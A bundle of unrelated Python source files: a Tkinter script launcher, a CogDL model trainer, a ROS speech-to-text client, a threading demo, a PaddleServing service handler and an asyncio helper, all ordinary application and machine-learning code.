self.errorInputArgument(v1,'Type (' +str(t1.__name__) + ') not found:')
return
if t1!=list:
k2 = u2.find('"')
if k2>=0:
self.errorInputArgument(v1,'Error input:')
return
#
if u2:
ARGSR.append(u1)
ARGSR.append(u2)
else:
if u2:
ARGSR.append(u1)
#
ua = re.split(';|,|"',u2)
for ui in ua:
ui2 = ui.strip()
if ui2:
ARGSR.append(ui2)
#
if demo1==0 and errInputRequired:
sv1 = ''
for e1 in errInputRequired:
sv1 +=e1+'\n'
#
self.errorInputArgument(sv1,'* Required input missing')
return
#
self.updateRecents()
self.exit1()
#
def run(self):
self.frame_r4.grid_forget()
self.pgFrame.grid(row=0,column=0, padx=0, pady=0)
#
a1,r1 = self.bt_add['state'],self.bt_rmv['state']
self.stop_b['state']='active'
self.bt_add['state']='disabled'
self.bt_rmv['state']='disabled'
self.bt_dir['state']='disabled'
#
self.var1.set("Running")
self.progress['value'] = 0
self.text2.configure(state='disabled')
#
self.progress.start()
self.t = TraceThread(target=self.runPy)
self.t.start()
#BUTTON STATUS
self.text2.configure(state='normal')
self.bt_dir['state']='active'
self.bt_add['state']= a1
self.bt_rmv['state']= r1
def finish(self):
self.progress.stop()
self.pgFrame.grid_forget()
self.frame_r4.grid(row=0, column=0,sticky='',pady=5)
#
def stop_progressbar(self):
self.textc.insert(tk.INSERT,"Stop by user")
self.finish()
self.t.killed = True
#
def checkSpecialCharacter(s):
s1 = s.replace("\\",'')
b= str(s1.encode('utf8'))
b = b.replace("\\",'')
b = b[2:len(b)-1]
return b!=s1
#
def haveParseInput(ar1):
for i in range(len(ar1)):
a01 = ar1[i].replace(' ','')
if a01.startswith('ARGVS=AppUtils.parseInput(PARSER_INPUTS') or\
a01.startswith('ARGVS=parseInput(PARSER_INPUTS') or a01.startswith('PARSER_INPUTS.add_argument('):
return True
if i>200:
return False
return False
#
def createRunFile(tpath,args):
s = "import sys,os\n"
s += "PATH_FILE = os.path.split(os.path.abspath(__file__))[0]\n"
if os.path.isfile(os.path.join(PATH_FILE,'AppUtils.py')):
plb = PATH_FILE
else:
plb = PATH_LIB
plb = plb.replace('\\','/')
s += "PATH_LIB = "+ '"'+plb+'"\n'
#
s += 'os.environ["PATH"] = PATH_LIB + ";" + os.environ["PATH"]\n'
s += 'sys.path.insert(0, PATH_LIB)\n'
s += 'import AppUtils\n'
#
s += "command = ["
for a1 in args:
a1 = a1.replace('\\','/')
s+='"'+a1 + '"' +","
s = s[:len(s)-1]
s+=']\n'
s+= 'print("Run : "+command[1])\n'
s+= 'print()\n'
s+= '#\n'
s+='AppUtils.runCommand(command,PATH_FILE)\n'
#
sfile = os.path.join(tpath,'run.py')
saveString2File(sfile,s)
return sfile
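# For reference, a generated run.py looks roughly like this (paths shortened and
# purely illustrative; the actual values depend on the selected app and its arguments):
#
#     import sys,os
#     PATH_FILE = os.path.split(os.path.abspath(__file__))[0]
#     PATH_LIB = "C:/Program Files (x86)/ASPEN/..."
#     os.environ["PATH"] = PATH_LIB + ";" + os.environ["PATH"]
#     sys.path.insert(0, PATH_LIB)
#     import AppUtils
#     command = ["C:/.../python.exe","C:/.../SomeApp.py","-fi","C:/.../case.OLR"]
#     print("Run : "+command[1])
#     print()
#     #
#     AppUtils.runCommand(command,PATH_FILE)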
#
def runFinal():
global ARGSR
if ARGSR!=None:
s1 = "\ncmd:\n"
for a1 in ARGSR:
s1 += '"'+a1 + '" '
#
logging.info(s1)
#
sfile = createRunFile(ARGVS.tpath,ARGSR)
argn = [ARGSR[0],sfile]
#
runSubprocess_noWait(argn)
else:
#cancel
logging.info('exit by user')
#
def main():
if ARGVS.tpath=='':
ARGVS.tpath = get_tpath()
#
FRUNNING,SRUNNING = openFile(ARGVS.tpath,'running')
#-----------------------------------
root = tk.Tk()
app = MainGUI(root)
root.mainloop()
#
runFinal()
#-----------------------------------
closeFile(FRUNNING)
deleteFile(SRUNNING)
#
if not isFile(ARGVS.tpath,'success'):
createFile(ARGVS.tpath,'cancel')
# "C:\\Program Files (x86)\\ASPEN\\Python38-32\\python.exe" "pyManager.pyw"
# "C:\\Program Files (x86)\\ASPEN\\Python38-32\\python.exe" pyManager.py -h
if __name__ == '__main__':
logger2File(PY_FILE)
main()
logging.shutdown()
|
trainer.py
|
import copy
import warnings
from typing import Optional
import numpy as np
from tqdm import tqdm
import os
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
from torch.nn.parallel import DistributedDataParallel
from torch.cuda.amp import GradScaler, autocast
from cogdl.wrappers.data_wrapper.base_data_wrapper import DataWrapper
from cogdl.wrappers.model_wrapper.base_model_wrapper import ModelWrapper, EmbeddingModelWrapper
from cogdl.trainer.trainer_utils import evaluation_comp, load_model, save_model, ddp_end, ddp_after_epoch, Printer
from cogdl.trainer.embed_trainer import EmbeddingTrainer
from cogdl.trainer.controller import DataController
from cogdl.loggers import build_logger
from cogdl.data import Graph
def move_to_device(batch, device):
if isinstance(batch, list) or isinstance(batch, tuple):
if isinstance(batch, tuple):
batch = list(batch)
for i, x in enumerate(batch):
if torch.is_tensor(x):
batch[i] = x.to(device)
elif isinstance(x, Graph):
x.to(device)
elif torch.is_tensor(batch) or isinstance(batch, Graph):
batch = batch.to(device)
elif hasattr(batch, "apply_to_device"):
batch.apply_to_device(device)
return batch
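# Minimal usage sketch for move_to_device (illustrative, CPU-only so it is safe
# to run anywhere; not part of the original module):
def _example_move_to_device():
    device = torch.device("cpu")
    batch = [torch.zeros(2, 3), torch.ones(4)]
    batch = move_to_device(batch, device)  # tensors are moved element-wise
    return all(t.device == device for t in batch)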
def clip_grad_norm(params, max_norm):
"""Clips gradient norm."""
if max_norm > 0:
return torch.nn.utils.clip_grad_norm_(params, max_norm)
else:
return torch.sqrt(sum(p.grad.data.norm() ** 2 for p in params if p.grad is not None))
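# Sketch showing the two behaviours of clip_grad_norm (illustrative only, never
# called at import time): with max_norm > 0 the gradients are clipped in place,
# with max_norm <= 0 only the total gradient norm is measured.
def _example_clip_grad_norm():
    model = torch.nn.Linear(4, 2)
    loss = model(torch.randn(3, 4)).sum()
    loss.backward()
    clipped = clip_grad_norm(model.parameters(), max_norm=1.0)   # clips in place
    measured = clip_grad_norm(model.parameters(), max_norm=0.0)  # only measures
    return clipped, measured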
class Trainer(object):
def __init__(
self,
epochs: int,
max_epoch: int = None,
nstage: int = 1,
cpu: bool = False,
checkpoint_path: str = "./checkpoints/model.pt",
resume_training: bool = False,
device_ids: Optional[list] = None,
distributed_training: bool = False,
distributed_inference: bool = False,
master_addr: str = "localhost",
master_port: int = 10086,
early_stopping: bool = True,
patience: int = 100,
eval_step: int = 1,
save_emb_path: Optional[str] = None,
load_emb_path: Optional[str] = None,
cpu_inference: bool = False,
progress_bar: str = "epoch",
clip_grad_norm: float = 5.0,
logger: str = None,
log_path: str = "./runs",
project: str = "cogdl-exp",
no_test: bool = False,
actnn: bool = False,
fp16: bool = False,
rp_ratio: int = 1,
):
self.epochs = epochs
self.nstage = nstage
self.patience = patience
self.early_stopping = early_stopping
self.eval_step = eval_step
self.monitor = None
self.evaluation_metric = None
self.progress_bar = progress_bar
if max_epoch is not None:
warnings.warn("The max_epoch is deprecated and will be removed in the future, please use epochs instead!")
self.epochs = max_epoch
self.cpu = cpu
self.devices, self.world_size = self.set_device(device_ids)
self.checkpoint_path = checkpoint_path
self.resume_training = resume_training
self.distributed_training = distributed_training
self.distributed_inference = distributed_inference
self.master_addr = master_addr
self.master_port = master_port
self.cpu_inference = cpu_inference
self.no_test = no_test
self.on_train_batch_transform = None
self.on_eval_batch_transform = None
self.clip_grad_norm = clip_grad_norm
self.save_emb_path = save_emb_path
self.load_emb_path = load_emb_path
self.data_controller = DataController(world_size=self.world_size, distributed=self.distributed_training)
self.logger = build_logger(logger, log_path, project)
self.after_epoch_hooks = []
self.pre_epoch_hooks = []
self.training_end_hooks = []
if distributed_training:
self.register_training_end_hook(ddp_end)
self.register_out_epoch_hook(ddp_after_epoch)
self.eval_data_back_to_cpu = False
self.fp16 = fp16
if actnn:
try:
import actnn
from actnn.conf import config
actnn.set_optimization_level("L3")
if rp_ratio > 1:
config.group_size = 64
except Exception:
pass
def register_in_epoch_hook(self, hook):
self.pre_epoch_hooks.append(hook)
def register_out_epoch_hook(self, hook):
self.after_epoch_hooks.append(hook)
def register_training_end_hook(self, hook):
self.training_end_hooks.append(hook)
def set_device(self, device_ids: Optional[list]):
"""
Return: devices, world_size
"""
if device_ids is None or self.cpu:
return [torch.device("cpu")], 0
if isinstance(device_ids, int) and device_ids > 0:
device_ids = [device_ids]
elif isinstance(device_ids, list):
pass
else:
raise ValueError("`device_id` has to be list of integers")
if len(device_ids) == 0:
return torch.device("cpu"), 0
else:
return [i for i in device_ids], len(device_ids)
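# Illustrative mapping of `device_ids` to (devices, world_size), per the logic above:
#     None, or cpu=True   -> ([torch.device("cpu")], 0)
#     [] (empty list)     -> CPU fallback, world size 0
#     [0, 1]              -> ([0, 1], 2)   # two GPUs, distributed world size 2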
def run(self, model_w: ModelWrapper, dataset_w: DataWrapper):
# for network/graph embedding models
if isinstance(model_w, EmbeddingModelWrapper):
return EmbeddingTrainer(self.save_emb_path, self.load_emb_path).run(model_w, dataset_w)
print("Model Parameters:", sum(p.numel() for p in model_w.parameters()))
# for deep learning models
# set default loss_fn and evaluator for model_wrapper
# mainly for in-cogdl setting
model_w.default_loss_fn = dataset_w.get_default_loss_fn()
model_w.default_evaluator = dataset_w.get_default_evaluator()
model_w.set_evaluation_metric()
if self.resume_training:
model_w = load_model(model_w, self.checkpoint_path).to(self.devices[0])
if self.distributed_training:
torch.multiprocessing.set_sharing_strategy("file_system")
self.dist_train(model_w, dataset_w)
else:
self.train(self.devices[0], model_w, dataset_w)
best_model_w = load_model(model_w, self.checkpoint_path).to(self.devices[0])
if self.no_test:
return best_model_w.model
final_test = self.evaluate(best_model_w, dataset_w)
# clear the GPU memory
dataset = dataset_w.get_dataset()
if isinstance(dataset.data, Graph):
dataset.data.to("cpu")
return final_test
def evaluate(self, model_w: ModelWrapper, dataset_w: DataWrapper, cpu=False):
if cpu:
self.devices = [torch.device("cpu")]
# disable `distributed` so that inference runs only once
self.distributed_training = False
dataset_w.prepare_test_data()
final_val = self.validate(model_w, dataset_w, self.devices[0])
final_test = self.test(model_w, dataset_w, self.devices[0])
if final_val is not None and "val_metric" in final_val:
final_val[f"val_{self.evaluation_metric}"] = final_val["val_metric"]
final_val.pop("val_metric")
if "val_loss" in final_val:
final_val.pop("val_loss")
if final_test is not None and "test_metric" in final_test:
final_test[f"test_{self.evaluation_metric}"] = final_test["test_metric"]
final_test.pop("test_metric")
if "test_loss" in final_test:
final_test.pop("test_loss")
self.logger.note(final_test)
if final_val is not None:
final_test.update(final_val)
print(final_test)
return final_test
def dist_train(self, model_w: ModelWrapper, dataset_w: DataWrapper):
mp.set_start_method("spawn", force=True)
device_count = torch.cuda.device_count()
if device_count < self.world_size:
size = device_count
print(f"Available device count ({device_count}) is less than world size ({self.world_size})")
else:
size = self.world_size
print(f"Let's using {size} GPUs.")
processes = []
for rank in range(size):
p = mp.Process(target=self.train, args=(rank, model_w, dataset_w))
p.start()
print(f"Process [{rank}] starts!")
processes.append(p)
for p in processes:
p.join()
def build_optimizer(self, model_w):
opt_wrap = model_w.setup_optimizer()
if isinstance(opt_wrap, list) or isinstance(opt_wrap, tuple):
assert len(opt_wrap) == 2
optimizers, lr_schedulers = opt_wrap
else:
optimizers = opt_wrap
lr_schedulers = None
if not isinstance(optimizers, list):
optimizers = [optimizers]
if lr_schedulers and not isinstance(lr_schedulers, list):
lr_schedulers = [lr_schedulers]
return optimizers, lr_schedulers
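# The model wrapper's setup_optimizer() may return any of the following shapes
# (illustrative only); build_optimizer normalizes them to (list, list-or-None):
#     optimizer                         -> ([optimizer], None)
#     (optimizer, scheduler)            -> ([optimizer], [scheduler])
#     ([opt1, opt2], [sched1, sched2])  -> ([opt1, opt2], [sched1, sched2])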
def initialize(self, model_w, rank=0, master_addr: str = "localhost", master_port: int = 10008):
if self.distributed_training:
os.environ["MASTER_ADDR"] = master_addr
os.environ["MASTER_PORT"] = str(master_port)
dist.init_process_group("nccl", rank=rank, world_size=self.world_size)
model_w = copy.deepcopy(model_w).to(rank)
model_w = DistributedDataParallel(model_w, device_ids=[rank])
module = model_w.module
model_w, model_ddp = module, model_w
return model_w, model_ddp
else:
return model_w.to(rank), None
def train(self, rank, model_w, dataset_w): # noqa: C901
model_w, _ = self.initialize(model_w, rank=rank, master_addr=self.master_addr, master_port=self.master_port)
self.data_controller.prepare_data_wrapper(dataset_w, rank)
self.eval_data_back_to_cpu = dataset_w.data_back_to_cpu
optimizers, lr_schedulers = self.build_optimizer(model_w)
if optimizers[0] is None:
return
est = model_w.set_early_stopping()
if isinstance(est, str):
est_monitor = est
best_index, compare_fn = evaluation_comp(est_monitor)
else:
assert len(est) == 2
est_monitor, est_compare = est
best_index, compare_fn = evaluation_comp(est_monitor, est_compare)
self.monitor = est_monitor
self.evaluation_metric = model_w.evaluation_metric
best_model_w = None
scaler = GradScaler() if self.fp16 else None
patience = 0
best_epoch = 0
for stage in range(self.nstage):
with torch.no_grad():
pre_stage_out = model_w.pre_stage(stage, dataset_w)
dataset_w.pre_stage(stage, pre_stage_out)
self.data_controller.training_proc_per_stage(dataset_w, rank)
if self.progress_bar == "epoch":
epoch_iter = tqdm(range(1, self.epochs + 1))
epoch_printer = Printer(epoch_iter.set_description, rank=rank, world_size=self.world_size)
else:
epoch_iter = range(1, self.epochs + 1)
epoch_printer = Printer(print, rank=rank, world_size=self.world_size)
self.logger.start()
print_str_dict = dict()
for epoch in epoch_iter:
for hook in self.pre_epoch_hooks:
hook(self)
# inductive setting ..
dataset_w.train()
train_loader = dataset_w.on_train_wrapper()
train_dataset = train_loader.get_dataset_from_loader()
if hasattr(train_dataset, "shuffle"):
train_dataset.shuffle()
training_loss = self.train_step(model_w, train_loader, optimizers, lr_schedulers, rank, scaler)
print_str_dict["Epoch"] = epoch
print_str_dict["train_loss"] = training_loss
val_loader = dataset_w.on_val_wrapper()
if val_loader is not None and epoch % self.eval_step == 0:
# inductive setting ..
dataset_w.eval()
# do validation in inference device
val_result = self.validate(model_w, dataset_w, rank)
if val_result is not None:
monitoring = val_result[self.monitor]
if compare_fn(monitoring, best_index):
best_index = monitoring
best_epoch = epoch
patience = 0
best_model_w = copy.deepcopy(model_w)
else:
patience += 1
if self.early_stopping and patience >= self.patience:
break
print_str_dict[f"val_{self.evaluation_metric}"] = monitoring
if self.distributed_training:
if rank == 0:
epoch_printer(print_str_dict)
self.logger.note(print_str_dict, epoch)
else:
epoch_printer(print_str_dict)
self.logger.note(print_str_dict, epoch)
for hook in self.after_epoch_hooks:
hook(self)
with torch.no_grad():
model_w.eval()
post_stage_out = model_w.post_stage(stage, dataset_w)
dataset_w.post_stage(stage, post_stage_out)
if best_model_w is None:
best_model_w = copy.deepcopy(model_w)
if self.distributed_training:
if rank == 0:
save_model(best_model_w.to("cpu"), self.checkpoint_path, best_epoch)
dist.barrier()
else:
dist.barrier()
else:
save_model(best_model_w.to("cpu"), self.checkpoint_path, best_epoch)
for hook in self.training_end_hooks:
hook(self)
def validate(self, model_w: ModelWrapper, dataset_w: DataWrapper, device):
# ------- distributed training ---------
if self.distributed_training:
return self.distributed_test(model_w, dataset_w.on_val_wrapper(), device, self.val_step)
# ------- distributed training ---------
model_w.eval()
dataset_w.eval()
if self.cpu_inference:
model_w.to("cpu")
_device = "cpu"
else:
_device = device
val_loader = dataset_w.on_val_wrapper()
with torch.no_grad():
result = self.val_step(model_w, val_loader, _device)
model_w.to(device)
return result
def test(self, model_w: ModelWrapper, dataset_w: DataWrapper, device):
# ------- distributed training ---------
if self.distributed_training:
return self.distributed_test(model_w, dataset_w.on_test_wrapper(), device, self.test_step)
# ------- distributed training ---------
model_w.eval()
dataset_w.eval()
if self.cpu_inference:
model_w.to("cpu")
_device = "cpu"
else:
_device = device
test_loader = dataset_w.on_test_wrapper()
if model_w.training_type == "unsupervised":
result = self.test_step(model_w, test_loader, _device)
else:
with torch.no_grad():
result = self.test_step(model_w, test_loader, _device)
model_w.to(device)
return result
def distributed_test(self, model_w: ModelWrapper, loader, rank, fn):
model_w.eval()
# if rank == 0:
if dist.get_rank() == 0:
if self.cpu_inference:
model_w.to("cpu")
_device = "cpu"
else:
_device = rank
with torch.no_grad():
result = fn(model_w, loader, _device)
model_w.to(rank)
object_list = [result]
else:
object_list = [None]
dist.broadcast_object_list(object_list, src=0)
return object_list[0]
def train_step(self, model_w, train_loader, optimizers, lr_schedulers, device, scaler):
model_w.train()
losses = []
if self.progress_bar == "iteration":
train_loader = tqdm(train_loader)
for batch in train_loader:
batch = move_to_device(batch, device)
if hasattr(batch, "train_mask") and batch.train_mask.sum().item() == 0:
continue
if scaler is not None:
with autocast():
loss = model_w.on_train_step(batch)
else:
loss = model_w.on_train_step(batch)
for optimizer in optimizers:
optimizer.zero_grad()
if scaler is not None:
scaler.scale(loss).backward()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model_w.parameters(), self.clip_grad_norm)
for optimizer in optimizers:
if scaler is not None:
scaler.step(optimizer)
else:
optimizer.step()
if scaler is not None:
scaler.update()
losses.append(loss.item())
if lr_schedulers is not None:
for lr_schedular in lr_schedulers:
lr_schedular.step()
return np.mean(losses)
def val_step(self, model_w, val_loader, device):
model_w.eval()
if val_loader is None:
return None
for batch in val_loader:
batch = move_to_device(batch, device)
model_w.on_val_step(batch)
if self.eval_data_back_to_cpu:
move_to_device(batch, "cpu")
return model_w.collect_notes()
def test_step(self, model_w, test_loader, device):
model_w.eval()
if test_loader is None:
return None
for batch in test_loader:
batch = move_to_device(batch, device)
model_w.on_test_step(batch)
if self.eval_data_back_to_cpu:
move_to_device(batch, "cpu")
return model_w.collect_notes()
|
example_client.py
|
#! /usr/bin/env python
from __future__ import print_function
import os
import signal
import sys
import threading
import time
import actionlib
import actionlib_msgs.msg as actionlib_msgs
import rospy
import gcloud_speech_msgs.msg as gcloud_speech_msgs
GoalStatus = actionlib_msgs.GoalStatus
def SpeechToTextSimpleExampleClient():
def DoneCallback(state, result):
print("\n\nDone, state {}, result:\n{}\n".format(state,result))
def ActiveCallback():
print("The goal is now active.\n")
def FeedbackCallback(feedback):
print("{}\n".format(feedback))
global sigint_received
sigint_received = False
def SignalIntHandler(signal, frame):
print("Received SIGINT.")
global sigint_received
sigint_received = True
def DelayedExit(wait_time):
time.sleep(wait_time)
os._exit(0)
signal.signal(signal.SIGINT, SignalIntHandler)
client = actionlib.SimpleActionClient(
"/cogrob/speech_to_text", gcloud_speech_msgs.SpeechToTextAction)
client.wait_for_server()
goal = gcloud_speech_msgs.SpeechToTextGoal()
client.send_goal(goal, done_cb=DoneCallback, active_cb=ActiveCallback,
feedback_cb=FeedbackCallback)
while client.get_state() in [GoalStatus.PENDING, GoalStatus.ACTIVE]:
time.sleep(1)
if sigint_received:
break
if sigint_received:
# Wait for 1 second and then force-kill the program, in case the action server
# is already dead (which is the case in our example launch file).
exit_thread = threading.Thread(target=DelayedExit, args=(1, ))
exit_thread.daemon = True
exit_thread.start()
client.cancel_goal()
client.wait_for_result()
if __name__ == '__main__':
try:
rospy.init_node("gcloud_speech_example_client", anonymous=True)
SpeechToTextSimpleExampleClient()
except rospy.ROSInterruptException:
print("Program interrupted before completion.", file=sys.stderr)
|
join_thread.py
|
# coding: utf-8
#########################################################################
# Website: <a href="http://www.crazyit.org">疯狂Java联盟</a>                        #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import threading
# Define the action function to be used as the body of a thread
def action(max):
for i in range(max):
print(threading.current_thread().name + " " + str(i))
# Start a child thread
threading.Thread(target=action, args=(100,), name="新线程").start()
for i in range(100):
if i == 20:
jt = threading.Thread(target=action, args=(100,), name="被Join的线程")
jt.start()
        # The main thread calls jt's join() method, so it must wait for
        # jt to finish before it continues.
jt.join()
print(threading.current_thread().name + " " + str(i))
|
local_service_handler.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import multiprocessing
#from paddle_serving_server import OpMaker, OpSeqMaker
#from paddle_serving_server import Server as GpuServer
#from paddle_serving_server import Server as CpuServer
from . import util
#from paddle_serving_app.local_predict import LocalPredictor
_LOGGER = logging.getLogger(__name__)
_workdir_name_gen = util.NameGenerator("workdir_")
class LocalServiceHandler(object):
"""
    LocalServiceHandler is the processor of the local service. It supports
    three client types: brpc, grpc and local_predictor. For brpc or grpc,
    the ability to start a serving server is provided; for local_predictor,
    local prediction is provided by paddle_serving_app.
"""
def __init__(self,
model_config,
client_type='local_predictor',
workdir="",
thread_num=2,
device_type=-1,
devices="",
fetch_names=None,
mem_optim=True,
ir_optim=False,
available_port_generator=None,
use_profile=False,
precision="fp32",
use_mkldnn=False,
mkldnn_cache_capacity=0,
mkldnn_op_list=None,
mkldnn_bf16_op_list=None):
"""
        Initialization of LocalServiceHandler.
Args:
model_config: model config path
client_type: brpc, grpc and local_predictor[default]
workdir: work directory
thread_num: number of threads, concurrent quantity.
device_type: support multiple devices. -1=Not set, determined by
`devices`. 0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu
devices: gpu id list[gpu], "" default[cpu]
fetch_names: get fetch names out of LocalServiceHandler in
local_predictor mode. fetch_names_ is compatible for Client().
mem_optim: use memory/graphics memory optimization, True default.
            ir_optim: use computation graph (IR) optimization, False default.
available_port_generator: generate available ports
use_profile: use profiling, False default.
            precision: inference precision, e.g. "fp32", "fp16", "int8"
use_mkldnn: use mkldnn, default False.
mkldnn_cache_capacity: cache capacity of mkldnn, 0 means no limit.
mkldnn_op_list: OP list optimized by mkldnn, None default.
mkldnn_bf16_op_list: OP list optimized by mkldnn bf16, None default.
Returns:
None
"""
if available_port_generator is None:
available_port_generator = util.GetAvailablePortGenerator()
self._model_config = model_config
self._port_list = []
self._device_name = "cpu"
self._use_gpu = False
self._use_trt = False
self._use_lite = False
self._use_xpu = False
self._use_mkldnn = False
self._mkldnn_cache_capacity = 0
self._mkldnn_op_list = None
self._mkldnn_bf16_op_list = None
if device_type == -1:
# device_type is not set, determined by `devices`,
if devices == "":
# CPU
self._device_name = "cpu"
devices = [-1]
else:
# GPU
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
elif device_type == 0:
# CPU
self._device_name = "cpu"
devices = [-1]
elif device_type == 1:
# GPU
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
elif device_type == 2:
# Nvidia Tensor RT
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
self._use_trt = True
elif device_type == 3:
# ARM CPU
self._device_name = "arm"
devices = [-1]
self._use_lite = True
elif device_type == 4:
# Kunlun XPU
self._device_name = "arm"
devices = [int(x) for x in devices.split(",")]
self._use_lite = True
self._use_xpu = True
else:
_LOGGER.error(
"LocalServiceHandler initialization fail. device_type={}"
.format(device_type))
if client_type == "brpc" or client_type == "grpc":
for _ in devices:
self._port_list.append(available_port_generator.next())
_LOGGER.info("Create ports for devices:{}. Port:{}"
.format(devices, self._port_list))
self._client_type = client_type
self._workdir = workdir
self._devices = devices
self._thread_num = thread_num
self._mem_optim = mem_optim
self._ir_optim = ir_optim
self._local_predictor_client = None
self._rpc_service_list = []
self._server_pros = []
self._use_profile = use_profile
self._fetch_names = fetch_names
self._precision = precision
self._use_mkldnn = use_mkldnn
self._mkldnn_cache_capacity = mkldnn_cache_capacity
self._mkldnn_op_list = mkldnn_op_list
self._mkldnn_bf16_op_list = mkldnn_bf16_op_list
_LOGGER.info(
"Models({}) will be launched by device {}. use_gpu:{}, "
"use_trt:{}, use_lite:{}, use_xpu:{}, device_type:{}, devices:{}, "
"mem_optim:{}, ir_optim:{}, use_profile:{}, thread_num:{}, "
"client_type:{}, fetch_names:{}, precision:{}, use_mkldnn:{}, "
"mkldnn_cache_capacity:{}, mkldnn_op_list:{}, "
"mkldnn_bf16_op_list:{}".format(
model_config, self._device_name, self._use_gpu, self._use_trt,
self._use_lite, self._use_xpu, device_type, self._devices,
self._mem_optim, self._ir_optim, self._use_profile,
self._thread_num, self._client_type, self._fetch_names,
self._precision, self._use_mkldnn, self._mkldnn_cache_capacity,
self._mkldnn_op_list, self._mkldnn_bf16_op_list))
def get_fetch_list(self):
return self._fetch_names
def get_port_list(self):
return self._port_list
def get_client(self, concurrency_idx):
"""
        get_client is only used in the local_predictor case. It creates one
        LocalPredictor object and initializes the paddle predictor via
        load_model_config. The concurrency_idx is used to select the running device.
Args:
concurrency_idx: process/thread index
Returns:
_local_predictor_client
"""
#checking the legality of concurrency_idx.
device_num = len(self._devices)
if device_num <= 0:
_LOGGER.error("device_num must be not greater than 0. devices({})".
format(self._devices))
raise ValueError("The number of self._devices error")
if concurrency_idx < 0:
_LOGGER.error("concurrency_idx({}) must be one positive number".
format(concurrency_idx))
concurrency_idx = 0
elif concurrency_idx >= device_num:
concurrency_idx = concurrency_idx % device_num
_LOGGER.info("GET_CLIENT : concurrency_idx={}, device_num={}".format(
concurrency_idx, device_num))
from paddle_serving_app.local_predict import LocalPredictor
if self._local_predictor_client is None:
self._local_predictor_client = LocalPredictor()
# load model config and init predictor
self._local_predictor_client.load_model_config(
model_path=self._model_config,
use_gpu=self._use_gpu,
gpu_id=self._devices[concurrency_idx],
use_profile=self._use_profile,
thread_num=self._thread_num,
mem_optim=self._mem_optim,
ir_optim=self._ir_optim,
use_trt=self._use_trt,
use_lite=self._use_lite,
use_xpu=self._use_xpu,
precision=self._precision,
use_mkldnn=self._use_mkldnn,
mkldnn_cache_capacity=self._mkldnn_cache_capacity,
mkldnn_op_list=self._mkldnn_op_list,
mkldnn_bf16_op_list=self._mkldnn_bf16_op_list)
return self._local_predictor_client
def get_client_config(self):
return os.path.join(self._model_config, "serving_server_conf.prototxt")
def _prepare_one_server(self, workdir, port, gpuid, thread_num, mem_optim,
ir_optim, precision):
"""
        According to self._device_name, generate one CPU/GPU/ARM server and
        set the model config and startup params.
Args:
workdir: work directory
port: network port
gpuid: gpu id
thread_num: thread num
mem_optim: use memory/graphics memory optimization
            ir_optim: use computation graph (IR) optimization
            precision: inference precision, e.g. "fp32", "fp16", "int8"
Returns:
server: CpuServer/GpuServer
"""
        # CPU, GPU and ARM servers share the same Op sequence; the concrete
        # device is selected below via set_gpuid()/set_device().
        from paddle_serving_server import OpMaker, OpSeqMaker, Server
        op_maker = OpMaker()
        read_op = op_maker.create('general_reader')
        general_infer_op = op_maker.create('general_infer')
        general_response_op = op_maker.create('general_response')
        op_seq_maker = OpSeqMaker()
        op_seq_maker.add_op(read_op)
        op_seq_maker.add_op(general_infer_op)
        op_seq_maker.add_op(general_response_op)
        server = Server()
        if gpuid >= 0:
            server.set_gpuid(gpuid)
# TODO: support arm or arm + xpu later
server.set_device(self._device_name)
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_precision(precision)
server.load_model_config(self._model_config)
server.prepare_server(
workdir=workdir, port=port, device=self._device_name)
if self._fetch_names is None:
self._fetch_names = server.get_fetch_list()
return server
def _start_one_server(self, service_idx):
"""
Start one server
Args:
service_idx: server index
Returns:
None
"""
self._rpc_service_list[service_idx].run_server()
def prepare_server(self):
"""
Prepare all servers to be started, and append them into list.
"""
for i, device_id in enumerate(self._devices):
if self._workdir != "":
workdir = "{}_{}".format(self._workdir, i)
else:
workdir = _workdir_name_gen.next()
self._rpc_service_list.append(
self._prepare_one_server(
workdir,
self._port_list[i],
device_id,
thread_num=self._thread_num,
mem_optim=self._mem_optim,
ir_optim=self._ir_optim,
precision=self._precision))
def start_server(self):
"""
Start multiple processes and start one server in each process
"""
for i, _ in enumerate(self._rpc_service_list):
p = multiprocessing.Process(
target=self._start_one_server, args=(i, ))
p.daemon = True
self._server_pros.append(p)
for p in self._server_pros:
p.start()
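# --- Usage sketch (illustrative addition, not part of the original module). ---
# It only uses the class defined above; the model directory path is a placeholder
# and paddle_serving_app must be installed for get_client() to work.
if __name__ == "__main__":
    handler = LocalServiceHandler(
        model_config="./serving_server_model",  # hypothetical model directory
        client_type="local_predictor",
        devices="")  # "" selects CPU; e.g. "0" would select GPU 0
    predictor = handler.get_client(concurrency_idx=0)
    # `predictor` is a paddle_serving_app LocalPredictor, ready for predict() calls.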
|
async_tools.py
|
import asyncio
import functools
from threading import Thread, enumerate
import concurrent.futures
def start_event_loop_new_thread() -> asyncio.AbstractEventLoop:
"""
Creates and starts a new event loop in a new thread
Returns
-------
loop : asyncio.AbstractEventLoop
The newly created loop
"""
loop = asyncio.new_event_loop()
t = Thread(target=start_background_loop, args=(loop,), daemon=True)
t.start()
return loop
def stop_event_loop_new_thread(loop: asyncio.AbstractEventLoop) -> None:
"""
Takes an event loop, stops it and once stopped closes it
Parameters
----------
loop : asyncio.AbstractEventLoop
The loop to stop and close
"""
thread_id = loop._thread_id
loop.call_soon_threadsafe(loop.stop)
threads = enumerate()
match = [thread for thread in threads if thread.ident == thread_id]
if len(match) == 1:
match[0].join(timeout=1)
def start_background_loop(loop: asyncio.AbstractEventLoop) -> None:
"""
